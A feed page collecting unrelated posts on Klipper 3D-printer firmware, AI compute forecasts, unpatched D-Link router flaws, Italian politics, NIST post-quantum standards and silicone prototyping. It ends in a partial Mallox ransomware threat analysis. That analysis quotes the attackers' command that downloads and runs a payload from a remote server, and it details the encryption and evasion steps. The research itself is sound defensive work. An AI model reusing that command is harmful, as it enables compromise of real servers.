Salta al contenuto principale



3D Printering: Switch and Klip(per)


Art of 3D printer in the middle of printing a Hackaday Jolly Wrencher logo

Last time I tried to convince you that, if you haven’t already, you should try running your 3D printer with Klipper. There are several ways to actually make it work.

The first thing you need is something to run the Klipper host. Most people use a Raspberry Pi and if you already have one that runs OctoPrint, for example, you might well use it. Just tuck your SD card away in case you give up and install a fresh Linux system on a new card.
19098021The Creality Sonic Pad has issues, but it does work.
However, a Pi isn’t your only option. You should be able to make it work on nearly anything that runs Linux. We’ve even seen it running on Windows under WSL. If you have an old laptop that can run Linux, that would work, too. We’ve even heard it works on a Chromebook.

The other option is to get a “pad.” Several vendors make touchscreens with some Linux single-board computer bundled together with Klipper preinstalled. For example, there is the Creality Sonic Pad, along with similar devices from other 3D printing companies.

If you decide to go that route, you might want to make sure it is easy to install your own software easily. Some pads, like the Creality unit, are notorious for having so much customization that they don’t lend themselves to upgrades unless they come from the manufacturer. In some cases, you can wipe out the stock firmware and install a normal operating system, but at that point, you could probably just buy a Pi and a touchscreen, right?

Installation


If you use something like a pad, it probably has a menu option to provide prebuilt firmware for your printer. Typically, you let it save the code to an SD card or a USB stick and then you are expected to flash it to your printer which, of course, depends on what kind of printer you have.

If you are rolling your own, you use a menu configuration program something like building a Linux kernel. If you have a pre-built configuration file, it will probably tell you in its comments what things you should pick. You need to know, for example, the type of CPU your board has, the bootloader offset, and if you are connecting via USB or serial. You can find details on the Klipper project pages.
19098023KIAUH makes installing Klipper and supporting programs painless.
Installing the Linux side is easy because there is a nice script called KIHUH. The easiest thing to do is clone the Git repository and run it. From there, you can install Klipper, Moonraker, Fluidd, Mainsail, and some other things, too.

The real trick isn’t installing the software. The challenge is creating a proper configuration file for your printer. If you have a totally stock and popular printer, you’ll probably be in luck. But, how many of us can say that?

Start with the GitHub list to see if your printer or board is there. Even if it isn’t an exact match for your hardware, it will give you a start. For example, my custom printer is a Fysetc Spider, but the canned configuration is for a core XY machine, which means I have to make changes.

Even if you get a pad that claims to be “plug and play,” don’t count on it. For example, a Creality Sonic Pad’s instructions for installing with a Creality Ender 3 first asks you to take the printer apart to determine the type of motherboard you have. That’s not really plug and play! Any deviation from the stock machine is likely to require you to change the default profile.

Ch…Ch…Ch…Changes


In addition to just setting things up to match my exact hardware, I also needed to adjust the extruder step count. That has to be simple, right? Most firmware requires you to plug in the number of steps per millimeter of filament.

Klipper, on the other hand, wants to know how many millimeters extrude from a full rotation of the stepper. If you know how many steps (and microsteps) your printer uses, you can easily calculate either number from the other. For example, if you have 200 steps per rotation and 16 microsteps, that’s 3200 steps total. If your current steps per millimeter is 100, then your Klipper “rotation distance” is 3200/100=32.

Configuration Example


I had another major change to make. My printers have a non-standard filament sensor that detects the filament moving. That way, it can detect not only broken filaments but jammed filaments, too.

To install it, I had to add a few lines to my printer.cfg file and restart Klipper. Since I have more than one printer with the same sensor, I put all the lines in a single file and then included it in each printer. So the printer.cfg change was very simple:
[include sfs.cfg]

Then the real work is in sfs.cfg:
[filament_motion_sensor SFS_T0]
detection_length: 10.00
extruder: extruder
switch_pin: ^PA4
pause_on_runout: True
event_delay: 3.0
pause_delay: 0.5
runout_gcode:
M117 Runout Detected!

[delayed_gcode DISABLEFILAMENTSENSOR]
initial_duration: 1
gcode:
SET_FILAMENT_SENSOR SENSOR=SFS_T0 ENABLE=0

[gcode_macro SFS_ENABLE] ; Add this to PRINT_START
description: Enable smart filament sensor
gcode:
M117 ENABLING the Smart Filament Sensor
G92 E0
SET_FILAMENT_SENSOR SENSOR=SFS_T0 ENABLE=1

[gcode_macro SFS_DISABLE] ; Add this to PRINT_END and PRINT_CANCEL
description: Disable smart filament sensor
gcode:
M117 DISABLING the Smart Filament Sensor
G92 E0
SET_FILAMENT_SENSOR SENSOR=SFS_T0 ENABLE=0

This defines a few macros you can use elsewhere. Like Python, the indentation matters. You can organize your files using [include], and that’s especially useful if you have multiple printers that can share files.

Reference


So, how do you know what’s available? The Klipper reference. It will show you all the configuration sections you can use and what can possibly go in them. Don’t forget that some features — like print status notifications — will be in the Moonraker configuration which is a separate document.

Since the system is in Python, you can hack on it to your heart’s content. Just back up first. For example, you can add some custom Python scripts in the klipper/extras directory, like the one that can run arbitrary system commands from G-code.

Tinkering is what most of us like the best, and there’s plenty of opportunity to tinker with here. Klipper is also a good way to put new life in a very old printer since what runs on the printer is very simple, and all the heavy lifting is done elsewhere.

Klipper can easily do adaptive bed leveling, for example. If you can work in Python, it is also easy to experiment with things like exotic sensors.


hackaday.com/2024/09/04/3d-pri…



Consumo Energetico e Limiti di Risorse: Il Futuro dell’IA quanto è incerto?


I ricercatori dell’organizzazione no-profit Epoch AI hanno analizzato una analisi dove parlano delle prospettive di sviluppo dell’intelligenza artificiale fino al 2030. Hanno esaminato quattro fattori chiave che potrebbero limitare i progressi in quest’area: consumo energetico, disponibilità dei chip, volume dei dati di addestramento e latenza di elaborazione.

Secondo il rapporto, la potenza di calcolo utilizzata per addestrare i modelli di intelligenza artificiale quadruplica ogni anno. Se questa tendenza continuerà fino alla fine del decennio, entro il 2030, la formazione sull’intelligenza artificiale utilizzerà 10.000 volte più risorse rispetto agli algoritmi più avanzati di oggi, come GPT-4 di OpenAI.

Gli esperti sottolineano che i moderni sistemi di intelligenza artificiale consumano già quantità significative di energia. Ad esempio, l’addestramento dell’ultimo modello di Meta ha richiesto il consumo energetico costante paragonabile a 23.000 famiglie statunitensi. Ed entro il 2030, anche con miglioramenti in termini di efficienza, l’addestramento di un modello di IA avanzato potrebbe richiedere una potenza 200 volte maggiore. Questo rappresenta già il 30% del consumo energetico di tutti i moderni data center.

Per superare le limitazioni, le aziende possono distribuire il processo di formazione su più data center. Questo approccio è già utilizzato da Google durante l’addestramento del modello Gemini Ultra. Tuttavia, richiede connessioni in fibra ultraveloci e con larghezza di banda elevata. In termini di chip, i ricercatori prevedono che entro il 2030 saranno disponibili tra i 20 e i 400 milioni di processori dedicati per eseguire l’intelligenza artificiale. Ciò potrebbe essere sufficiente per creare un modello che utilizza 50.000 volte più risorse di elaborazione rispetto a GPT-4.

Anche la quantità di dati di qualità per addestrare gli algoritmi è motivo di preoccupazione. Alcuni esperti prevedono che la disponibilità di dati testuali di alta qualità disponibili al pubblico potrebbe esaurirsi già nel 2026. Tuttavia, Epoch AI ritiene che ciò non limiterà la crescita dei modelli almeno fino al 2030.

Naturalmente le moderne reti neurali non vengono addestrate solo sui testi, ma anche su immagini, audio e video. Ciò amplia notevolmente la portata dei materiali disponibili. Inoltre, le aziende stanno sperimentando l’uso di dati sintetici. Tenendo conto di tutte le fonti, inclusi testo, contenuti multimediali e set di dati sintetici, Epoch AI stima che entro il 2030 avremo informazioni sufficienti per addestrare modelli utilizzando risorse di elaborazione 80.000 volte superiori rispetto a GPT-4.

Dopo aver confrontato tutti i fattori limitanti, gli esperti di Epoch AI sono giunti alla conclusione che è tecnicamente possibile creare modelli di intelligenza artificiale che utilizzano 10.000 volte più risorse di calcolo rispetto ai sistemi moderni. Il limite principale in questo caso sarà il consumo energetico.

Tuttavia, realizzare una crescita così massiccia richiederà ingenti investimenti. Il CEO di Anthropic, Dario Amodei, stima che il costo della formazione di un singolo modello potrebbe aumentare da 1 miliardo di dollari oggi a 10 miliardi di dollari l’anno prossimo e raggiungere i 100 miliardi di dollari negli anni successivi.

La volontà delle aziende di investire tali importi dipenderà dai vantaggi pratici dei sistemi di intelligenza artificiale. Se la scalabilità continua a portare miglioramenti significativi e nuove funzionalità, l’investimento potrebbe valerne la pena. Epoch AI stima che se l’IA riuscisse ad automatizzare una parte significativa delle attività economiche, il ritorno finanziario potrebbe essere di trilioni di dollari.

Tuttavia, alcuni critici ritengono che i modelli linguistici e multimodali di grandi dimensioni potrebbero rappresentare un costoso vicolo cieco nello sviluppo tecnologico.

L'articolo Consumo Energetico e Limiti di Risorse: Il Futuro dell’IA quanto è incerto? proviene da il blog della sicurezza informatica.



On the podcast this week: generative AI Doom, drama in NaNoWriMo, and Apple's face swap problem.

On the podcast this week: generative AI Doom, drama in NaNoWriMo, and Applex27;s face swap problem.#Podcast




Le 4 RCE sui Router D-Link DIR-846W non verranno risolte comunica l’azienda


D-Link ha annunciato che quattro vulnerabilità RCE (Remote Code Execution) che interessano tutte le versioni dei router DIR-846W non verranno risolte perché il supporto per questi dispositivi è già scaduto.

Le vulnerabilità RCE, tre delle quali hanno uno stato critico e non richiedono autenticazione, sono state scoperte da un ricercatore di sicurezza informatica con lo pseudonimo yali-1002, che il 27 agosto 2024 ha pubblicato informazioni minime su questi problemi nel suo repository GitHub.

Lo specialista si è astenuto dal pubblicare exploit proof-of-concept.

Una breve descrizione dei bug è la seguente:

  • CVE-2024-41622 – vulnerabilità relativa all’esecuzione di comandi in remoto tramite il parametro tomography_ping_address nell’interfaccia /HNAP1/ (punteggio CVSS 9,8);
  • CVE-2024-44340 – Vulnerabilità RCE nei parametri smartqos_express_devices e smartqos_normal_devices in SetSmartQoSSettings, che richiede l’autenticazione (punteggio CVSS 8.8);
  • CVE-2024-44341 – RCE tramite il parametro lan(0)_dhcps_staticlist, che può essere sfruttato tramite una richiesta POST modificata (CVSS Score 9.8);
  • CVE-2024-44342 — RCE tramite il parametro wl(0).(0)_ssid (9,8 sulla scala CVSS).

Sebbene i rappresentanti di D-Link abbiano riconosciuto i problemi e la loro gravità, la società ha affermato che il supporto per i dispositivi è scaduto nel 2020, il che significa che potrebbero non essere previsti aggiornamenti per correggere questi bug.

“D-Link consiglia vivamente di interrompere l’uso di questo prodotto e avverte che qualsiasi uso continuato può rappresentare un pericolo per i dispositivi ad esso collegati”, avverte il produttore nel suo bollettino di sicurezza.

Vale la pena notare che il router DIR-846W è ancora disponibile in alcuni mercati, inclusa l’America Latina.

L'articolo Le 4 RCE sui Router D-Link DIR-846W non verranno risolte comunica l’azienda proviene da il blog della sicurezza informatica.



Sangiuliano: “Quando il rapporto con Boccia è diventato un fatto privato ho bloccato la sua nomina”


@Politica interna, europea e internazionale
Il ministro della Cultura Gennaro Sangiuliano ammette di aver avuto una relazione privata con Maria Rosaria Boccia. Sarebbe questo il motivo per cui la nomina della donna a consigliera del ministro per i grandi eventi non è stata formalizzata. A riportare le



Boccia attacca Sangiuliano: “Te l’ho già detto ieri al telefono, non storpiare la realtà per coprire chi non lo merita”


@Politica interna, europea e internazionale
Maria Rosaria Boccia rende pubblico di aver avuto nelle ultime ore una telefonata con il ministro della Cultura Gennaro Sangiuliano e lo accusa pubblicamente di “storpiare la realtà per coprire” qualcuno. “Te l’ho detto ieri pomeriggio



🎥 Oggi dalle ore 15 in occasione della #BiennaleCinema2024, si terrà la cerimonia di premiazione del #concorso scolastico nazionale promosso dal #MIM “Da uno sguardo – film di studentesse e studenti sulla violenza maschile contro le donne”.


Bruegel: European Commission should build muscle to regulate killer acquisitions


After EU's top court issued a ruling seemingly limiting the Commission's authority to halt "killer acquisitions," influential think tank Bruegel argued on Wednesday (4 September) that EU's competition regulator should have a stronger regulatory strategy reviewing these.


euractiv.com/section/competiti…



La Criptografia Post-Quantistica è Arrivata! Scopri i Nuovi Standard NIST per Proteggere il Futuro Digitale


Il National Institute of Standards and Technology (NIST) del Dipartimento del Commercio degli Stati Uniti ha finalizzato il suo set principale di algoritmi di crittografia progettati per resistere agli attacchi informatici da parte di un computer quantistico.

I ricercatori di tutto il mondo stanno correndo per costruire computer quantistici che funzionerebbero in modi radicalmente diversi dai normali computer e potrebbero violare l’attuale crittografia che fornisce sicurezza e privacy per quasi tutto ciò che facciamo online.

Per difendersi da questa vulnerabilità, gli algoritmi recentemente annunciati sono specificati nei primi standard completati dal progetto di standardizzazione della crittografia post-quantistica (PQC) del NIST e sono pronti per l’uso immediato. Questi standard di crittografia post-quantistica proteggono un’ampia gamma di informazioni elettroniche, dai messaggi di posta elettronica riservati alle transazioni di e-commerce che spingono l’economia moderna. Il NIST incoraggia gli amministratori di sistemi informatici a iniziare la transizione ai nuovi standard il prima possibile.

La crittografia post-quantistica (PQC) comprende sistemi crittografici progettati per proteggere le informazioni sensibili dalle potenziali minacce poste dal calcolo quantistico. Man mano che i computer quantistici sviluppano la capacità di eseguire calcoli complessi a velocità senza precedenti, i metodi di crittografia esistenti, in particolare quelli basati su algoritmi asimmetrici come RSA ed Elliptic Curve Cryptography (ECC), affrontano vulnerabilità significative. In particolare, algoritmi come l’algoritmo di Shor possono fattorizzare in modo efficiente numeri interi grandi, rendendo i sistemi crittografici tradizionali suscettibili alle violazioni, accendendo così un’urgenza globale per soluzioni robuste e resistenti ai quanti.

Leggi l’annuncio completo del NIST: nist.gov/news-events/news/2024…
Per saperne di più su PQC, leggi questa spiegazione: nist.gov/cybersecurity/what-po…

La transizione alla crittografia post-quantistica è fondamentale per la salvaguardia delle comunicazioni digitali in vari settori, in particolare nella finanza e nella sicurezza nazionale, dove l’integrità e la riservatezza dei dati sono fondamentali. Il National Institute of Standards and Technology (NIST) sta guidando la definizione di nuovi standard per PQC. Questa iniziativa sottolinea la necessità per i settori pubblico e privato di adottare proattivamente misure di crittografia resistenti ai quanti per affrontare in modo preventivo le imminenti minacce quantistiche che potrebbero compromettere i quadri di sicurezza consolidati .

Con l’evoluzione della tecnologia di calcolo quantistico, devono evolversi anche le strategie per la sicurezza dei dati.

La collaborazione tra enti governativi, esperti del settore e istituzioni accademiche è essenziale per facilitare la rapida integrazione delle soluzioni PQC e per promuovere lo sviluppo di standard crittografici resilienti in grado di resistere al panorama delle minacce quantistiche

L'articolo La Criptografia Post-Quantistica è Arrivata! Scopri i Nuovi Standard NIST per Proteggere il Futuro Digitale proviene da il blog della sicurezza informatica.



"Marty, presto, dobbiamo tornare indietro nell'anno in cui é stato inventato Facebook e impedire così a orde di boomer di iscriversi e smarronare su quanto stavano bene negli anni 70 , presto! "
#ritornoalfuturo

Franc Mac reshared this.



CULTURA. La diaspora palestinese e la parola parlata della poetessa Rafeef Ziadah (Parte 3)


@Notizie dall'Italia e dal mondo
Terza parte dell'articolo sull'artista, attivista per i diritti umani, femminista e accademica che vive a Londra. Rafeef Ziadah ha scritto poesie che si potrebbero definire profetiche.
L'articolo CULTURA. La diaspora



Multi-Material Printing Enables Low Cost Silicone Prototypes


19084729

While it’s the ideal choice for mass production, injection molding is simply no good for prototyping. The molds are expensive and time-consuming make, so unless you’ve got the funding to burn tens of thousands of dollars on producing new ones each time you make a tweak to your design, they’re the kind of thing you don’t want to have made until you’re absolutely sure everything is dialed in and ready. So how do you get to that point without breaking the bank?

That’s not always an easy question, but if you’re working with silicone parts, the team at OpenAeros thinks they might have a solution for you. As demonstrated through their OpenRespirator project, the team has developed a method of 3D printing single-use molds suitable for large silicone parts that they’re calling Digital-to-Silicone (D2S).

19084731In the video below, [Aaron] and [Jon] explain that they started off by simply printing injection molds in the traditional style. This worked, but the molds can get quite complex, and the time and effort necessary to design and print them wasn’t a great fit for their iterative development cycle. They wanted to be able to do from design to prototype in a day, not a week.

Eventually they realized that if they printed the mold out of a water-soluble filament, they could simplify its design greatly. They’ve documented the design process in detail, but the short version is that you essentially subtract the 3D model of the design you want to produce from a solid shape in your CAD package, and add a few holes for injecting the silicone. Once the silicone has cured, the mold can be dissolved away in warm water to reveal the finished part.

They then took this concept a step further. Thanks to the multi-material capabilities offered by some of the latest 3D printers, it’s possible to print structures within the mold. Once the silicone is injected, these structures can become part of the finished part. For the OpenRespirator, this lets them add PETG stiffening rings around where the filters to snap into the silicone mask body.

As an added bonus, the video also goes over their method of prototyping pleated filters with 3D printed forms. After inserting the filter media, snap-in arms push it down into the valleys of the form to create the pleats. These are held in place with the addition of small metal rods that are attracted to the magnets embedded into the form. Once the top and bottom of the form have been closed over the filter, silicone is injected to create a ring around the filter and lock everything into place.

19084733

We often think of 3D printing as ideal for prototyping, but usually in a very direct and obvious way. You print out a part to see if it works the way you want, and then take the design and have it made out of something stronger. But this presentation from OpenAeros shows just how versatile the technology can be. With even a half-way decent desktop printer, the potential time and cost savings can be enormous. Something to keep in mind should one of your side projects turn into something bigger.

youtube.com/embed/2BCotdFDuuc?…


hackaday.com/2024/09/04/multi-…



Mallox ransomware: in-depth analysis and evolution


19080080

Mallox is a sophisticated and dangerous family of malicious software that has been causing significant damage to organizations worldwide. In 2023, this ransomware strain demonstrated an uptick in attacks, the overall number of discovered Mallox samples exceeding 700. In the first half of 2024, the malware was still being actively developed, with new versions being released several times a month, while the Mallox RaaS affiliate program advertised on dark web forums was seeking new partners. This article aims to provide a comprehensive technical overview of the ransomware and its history.

Background


Mallox started operating in the first half of 2021, with the first known encryptor sample discovered in May 2021. From the very beginning, this malware was used in human-operated attacks against companies and organizations. The Trojan samples were tailored to each specific victim, with the name of the target company hardcoded in the ransom notes and the extension of the encrypted files. This is why this malware strain is known under many different aliases: the Trojan was not originally named “Mallox”, and each researcher introduced their own moniker for this malware.

In order to illustrate the different names used by Mallox variants throughout the family’s existence, we parsed more than 700 samples and built a table showing the numerous extensions we found in those.

2021# of samples2022# of samples2023# of samples2024 H1# of samples
.architek1.avast1.bitenc1.hmallox2
.artiis1.bozon3.host1.ma1x05
.brg1.bozon31.mallab223.mallox21
.herrco1.carone1.mallox210.rmallox57
.mallox6.consultransom2.malloxx30.tif1
.servimo1.deviceZz1.malox63
.tohnichi3.exploit1.maloxx8
.explus1.xollam7
.FARGO1
.FARGO21
.FARGO320
.mallox100
.prismchigo1
.rexiaa1

In early 2023, SuspectFile published an interview with individuals who claimed to be the threat actors behind Mallox. In the interview, the actor stated that they purchased the source code for the encryption Trojan in 2022. That might mean that it was previously operated by another group, which would explain the change in the naming pattern: from a unique name for each victim to the “Mallox” universal branding.

Most articles and blog posts refer to this strain as Mallox, Tohnichi, Fargo or TargetCompany.

Timeline


Judging by the PE timestamps in the discovered samples, which proved to be unaltered and represent the actual release date of the given sample, there were several spikes in new samples: late 2022, early 2023 and late 2023.

Discovered Mallox samples by PE timestamp (download)

The number of ITW Mallox samples strongly correlates with Kaspersky Security Network (KSN) telemetry. KSN is our cyberthreat-related data processing system, which works with data consensually provided by Kaspersky users. The graph below shows spikes in unique users who encountered the Mallox ransomware in March 2023 and October 2023, which match the previous graph and indicate increased activity by the group during these periods.

Mallox ransomware activity (download)

RaaS promotion


A January 2023 post on the dark web forum RAMP by a user named Mallox promoted a ransomware-as-a-service affiliate program with the same name.

The original ad for Mallox RaaS
The original ad for Mallox RaaS

The translation of the post is given below.

Mallox is looking for pentesters with their own material to join the team or as partners
If you have your own material, we are ready to offer high-quality software and support

Features:
– Blog
– Web panel with pricing settings per client, chat, Statistics and bonuses
– Encryption: elliptic-curve cryptography + ChaCha20 + many software updates made
– Clean code

Terms:
– 70% for you, 30% for us
– 80% for you, 20% for us if you have a lot of material and large networks
– Experience is key! Don’t write if you’re out to practice, don’t waste our time, there will be a selection process, we don’t accept all comers, only a limited number of partners on a long-term basis!
– We will disable inactive ones over time
– We don’t do business with English speakers

IM in Jabber for details: [redacted]

The ad states that the RaaS owners are looking for “pentesters”, i.e. affiliates willing to search for and infiltrate companies. Priority is given to those affiliates that have already obtained unauthorized access to a lot of organizations and/or large networks. Such partners are offered 80% of the profits, while those without a substantial number of readily available victim networks are invited to work for 70% of the ransom.

The poster emphasizes that they are looking only for long-term relationships with experienced affiliates. They are not interested in wasting their time on novice cybercriminals and do not provide any training. The RaaS representative also stresses that they do not work with English-speaking affiliates.

Another RAMP post by the same user in September 2023 said the group was willing to purchase access credentials to victim networks, most likely to launch ransomware attacks on their own.

Market – Access (SSH/RDP/VNC/Shell) / Ищем поставщика доступов.Сотрудничество\Реализация.
Заберем доступы под реализацию. Условия сортудничества – оговариваются лично.
– Интересуют доступы: фортики, циско впн и другие.
– Revenue от 10kk+
– Юзер в домене.
– AD.
– Гео US/CA/AU/UK/DE.
– Не интересуют: EDU/GOV
– Тематика рассматривается индивидуально, госпитали и учебные заведения не иинтересуют.
– Работаем честно и четко, поставщик будет иметь доступ к панели и чатам и видеть все на свои глаза.
– Если будет постоянный поток ТОП мата , готовы предоставить вам лучшие условия и забрать к себе в приват.

Контакты джаббер: [redacted]

Market – Access (SSH/RDP/VNC/Shell) / Looking for an access provider. Partnership/Purchases.
Will buy access credentials for use. Terms to be negotiated in private.
– Interested in access to Fortinet VPN, Cisco VPN, etc.
– Revenue from 10kk+
– Domain user
– AD
– Geo: US/CA/AU/UK/DE
– Not interested in: EDU/GOV
– Industries considered on case-by-case basis. Not interested in hospitals or schools.
– We do business honestly and transparently: the seller will have access to the panel and chat to see it all with their own eyes.
– If there is a constant flow of TOP material, we are ready to give you the best terms and offer you a private deal.

Jabber contact: [redacted]

This post sheds further light on the Mallox RaaS creators’ business model. They look for wealthy victim companies with revenue of $10 million or more in any of the five listed countries. They also aim to avoid attacking educational, governmental and healthcare organizations.

Statistics on the RaaS affiliates


By analyzing Mallox samples, we were able to determine that starting in 2022, the developers added C&C reporting to their malware. This sends information about each infected computer, but more interestingly, it also appends an affiliate ID string to the Trojan’s HTTP request. We extracted these affiliate IDs from the samples we had obtained and built a data model, which allowed us to investigate the distribution of samples across partners throughout the evolution of the RaaS program.

Affiliate ID string# of samples
admin72
amigosbos9k55
bitenc1
bloodbeard2
caneddy1
grinder10
hiervos251
last1
lastsmile2
leandra561
loader7
maestro170
mallox2
Neuroframe11
panda42
samuel13
truetl4
UserHelp4
vampir65

We also analyzed the changes in the distribution of samples across the most active affiliates by year. These changes indicate that after the launch of the RaaS program, it rapidly expanded to reach 16 active affiliates operating 500 samples, and then shrank in the first half of 2024. At the time of writing this post, we observed a total of 19 Mallox RaaS partners.

Also notable is the fact that the original five affiliates that were working with Mallox in 2022 continue to do so in 2024. This might indicate that the core subscribers seem to be satisfied with the program’s terms and prefer it to other options available on the darknet market.

Please note that at the time of writing this report, the data for 2024 was limited to H1.

Mallox samples by affiliate ID
Mallox samples by affiliate ID

Typical infection scenario


Mallox affiliates are free to choose their methods of compromising victims’ networks. Some of the campaigns we observed involved sending spam with malicious attachments. In another recent campaign in China, the threat actors allegedly exploited a vulnerability in the IP-Guard software for initial access.

While analyzing KSN telemetry, we determined that one of the most common infection vectors used by the attackers was penetrating internet-facing MS SQL or PostgreSQL servers. To achieve this, the threat actors typically either exploit RCE vulnerabilities, such as CVE-2019-1068 or CVE-2020-0618 in unpatched MS SQL server installations, or carry out brute-force or dictionary attacks.

Typical Mallox attack pattern
Typical Mallox attack pattern

The compromised MS SQL server process executes a command that creates a PowerShell script and launches it using the sqlps command, then starts the first stage portable executable (PE) payload downloaded by the PowerShell script.
cmd.exe /C "echo $cl = New-Object System.Net.WebClient >%APPDATA%\alta.ps1 & echo $cl.DownloadFile("hxxp[:]//<ip address>/scavenger.exe", "%APPDATA%\box.bat") >> %APPDATA%\alta.ps1 & sqlps -ExecutionPolicy Bypass %APPDATA%\alta.ps1 & WMIC process call create "%APPDATA%\box.bat""
This first-stage PE payload in Mallox attacks is typically either a sample of the Remcos RAT subsequently used by the operators for remote access to the compromised network, or a .NET downloader that automatically fetches the second-stage PE payload, which is the encryption Trojan. The .NET downloaders used in this scheme are mostly simplistic and implement a procedure to download a binary from the hardcoded URL, decrypt it with a XOR loop and execute it in memory.

Analysis


Several hundred different samples have been found since the first version of Mallox was discovered. Mallox developers have continued to improve the ransomware and add new features. For convenience, we divided these samples into several different versions. Below, we will perform a detailed analysis of the first and the latest known versions. Moreover, we will provide a comparison table with other known versions to show how the Trojan has evolved, what features have been added and how the cryptographic scheme has changed.

Earliest known Mallox version (9b772efb921de8f172f21125dd0e0ff7, v1)


This sample was discovered in mid-May 2021 and is the first discovered executable file belonging to the Mallox ransomware family. It is considered to be the original Mallox version. We have found several samples of this version with various extensions and notes that contain explicit names of the victim organizations. This is one of the few variants of Mallox that support debug logging, which outputs errors and other information about the encryption process to the console. In later versions, the logging functionality was removed or excluded from the release build.

The ransom note left behind by the original Mallox version looks typical of ransomware: it contains a unique victim identifier, conditions for file decryption, a threat to publish stolen data and the address of the negotiators’ website on the Tor network. To demonstrate their ability to decrypt files, the attackers offer to decrypt several test files that do not contain important data. In this version, the victim organization’s name is explicitly indicated inside the note.

Mallox ransom note from the original version
Mallox ransom note from the original version

Preparing for encryption


Before encrypting files on the device, the ransomware performs several preparatory steps. First, it checks the language settings of the victim’s operating system. The ransomware immediately terminates if a Russian, Kazakh, Tatar, Belarusian or Ukrainian language identifier is set. Developers of malware typically do this if they hope to avoid prosecution in the countries where the languages are spoken. However, in the interview published in January 2023, a Mallox representative said of these restrictions, “This is due to the developer’s own decision to restrict our operations in those regions. We have no prejudices or preferences in which countries to work”. In the same interview, they claim that the project’s code previously had been used by other ransomware groups and subsequently purchased by the current threat actors. This means that early samples may not be linked to the current owners of Mallox, or that several independent groups may be using these.

Mallox main function
Mallox main function

If the default language of the operating system is not on the exclusion list, the ransomware process obtains the SeTakeOwnershipPrivilege and SeDebugPrivilege privileges. Next, it removes the keys and values from the registry using the WinAPI function SHDeleteKeyW, apparently to counter system defenses.

After that, Mallox deletes the shadow copies using the vssadmin.exe utility and completely disables Windows Recovery Environment.

Drives enumeration and exclusions


Mallox encrypts data on all drives from A through Z if these have the following types: DRIVE_REMOTE, DRIVE_REMOVABLE or DRIVE_FIXED. It also supports text files containing paths for encryption via the command-line arguments, such as “-p” and “-d”. If the argument “-d <text_file_path>” is set, the ransomware encrypts only the paths in the text file and does not encrypt the device’s drives recursively. If the argument “-p <text_file_path>” is set, it first encrypts the paths in the text file and only then, the data on local drives. The full list of file path arguments accepted by the original version of Mallox is provided below.

ArgumentDescription
-d <path>Expects a path to the text file, encrypts only the paths in the file.
-p <path>Expects a path to the text file, first encrypts the paths in the file and only then the drives.
-l <path>Expects a path to the text file. It was not noticed that it affected anything.

To calculate the count of threads that will be used to encrypt files, Mallox uses the WinAPI function GetSystemInfo. It gets the dwNumberOfProcessors value from this function and doubles it. However, the count of threads is limited to 64 and cannot exceed this value.

Mallox supports allowlist functionality. Lists of extensions, folder names and file names which must not be encrypted are embedded into the ransomware. The folder names include the names of the operating system folders and certain widely known applications. One of the interesting names among the exception files is “debugLog.txt”, which is presumably used for debugging purposes.

Below is pseudocode for iterating through drives, which is done if the “-d” argument is not set. The code shows that Mallox can use two different directory and file iterating methods: manual NTFS parsing and File Management Functions (WinAPI).

Drive search code for encryption
Drive search code for encryption

Cryptography


Mallox implements a convoluted encryption scheme consisting of several cryptographic algorithms.

Every time Mallox starts, it generates a new user private ECC (elliptic curve) key to be used with ECDH (Elliptic-curve Diffie–Hellman key agreement protocol on the Curve25519). To generate this private key, the ransomware uses the pseudorandom number generator Mersenne Twister, the seed for which is generated using the WinAPI function CryptGenRandom. If there are problems with initializing the Cryptographic Service Provider (CryptGenRandom cannot be used), then the seed is generated via a set of functions: QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, and the __rdtsc instruction. The outputs of these functions are multiplied and used as a Mersenne Twister seed.

Mersenne Twister seed generation
Mersenne Twister seed generation

The generated ECC private key is 32 bytes in size. From this private key, the Trojan generates a corresponding user ECC public key. The Trojan then calculates a shared secret using the Elliptic-curve Diffie–Hellman key agreement protocol (ECDH) from the user ECC private key and the attacker’s master ECC public key that is hardcoded in the Trojan’s body. The user ECC private key is not stored anywhere, and the user ECC public key is added to each encrypted file and is necessary for attackers to recalculate the shared secret.

In the picture below, the first call to the curve25519 function generates a user public key, and the next call generates a shared key, which is then hashed with SHA-256.

Code for generating a shared secret
Code for generating a shared secret

The first six bytes of the user ECC public key in hexadecimal form are used as the unique identifier of the victim, referred to as “personal identifier” in the note. It is generated uniquely each time the ransomware starts and does not depend on the device, so the identifier will change with each new run.

Files that are not on the allowlists are encrypted with the ChaCha20 stream cipher. The file key and nonce for ChaCha are encrypted using the symmetric encryption algorithm AES-128 in CTR mode. The key for AES is the first half of the SHA-256 hash of the shared secret obtained previously by using the ECDH protocol.

Files smaller than or equal to 10240 bytes are encrypted in their entirety. Larger files are encrypted using a stripe method: the file is broken down into 100 pieces, each further divided into 100 chunks. Each of the resulting chunks is encrypted with ChaCha. If the chunk size is less than 4096 bytes, the malware expands its size to 4096 bytes prior to encryption.

At the end of each encrypted file, Mallox appends a structure we will designate as a “technical buffer”, which stores the information necessary to decrypt the file. The Mallox sample in question has a minimalistic buffer that contains only an encrypted key and nonce for ChaCha, IV for AES, and the user’s ECC public key. The latter is intended to be used by attackers to recover the shared secret and calculate its SHA-256 hash, the first half of which is the encryption key for AES-128 CTR, and, along with IV, is necessary to decrypt the ChaCha key and nonce.

In the picture below, the ChaCha key and nonce are shown in red, AES CTR in blue, and the public user ECC key in orange.

Technical buffer structure saved at the end of the file
“Technical buffer” structure saved at the end of the file

After the encryption is complete, the executable file is deleted via the “del” command.

Communication with the attackers’ C&C server


Before starting the file encryption process starts, Mallox sends the following information about the infected device to the attacker’s server using an HTTP POST request: the victim’s unique identifier obtained from the public key, the local computer name and the DNS name of the primary domain determined via a call to LsaQueryInformationPolicy with the PolicyDnsDomainInformation parameter.

Code to send an HTTP request
Code to send an HTTP request

After the encryption is completed, the ransomware sends a request to the attacker’s server again, with the victim’s ID and information about the encrypted disks.

Recent Mallox version (e98b3a8d2179e0bd0bebba42735d11b7, v12)


This is one of the most recent versions of the Mallox ransomware, found in March 2024. Below, we provide an analysis of this version, but the main purpose of the analysis is to show the difference between the first and the recent versions.

Compared to the original version of Mallox, one of the significant changes that occurred in later versions concerned the format of the note. The original version explicitly showed the name of the attacked company and device, but later versions more often had a generic note and extensions.

Generic ransom note
Generic ransom note

New arguments
ArgumentDescription
-path <path>Does not work in this version. Expects a path to encrypt.
-queue <integer>Does not work in this version. Expects an integer value.

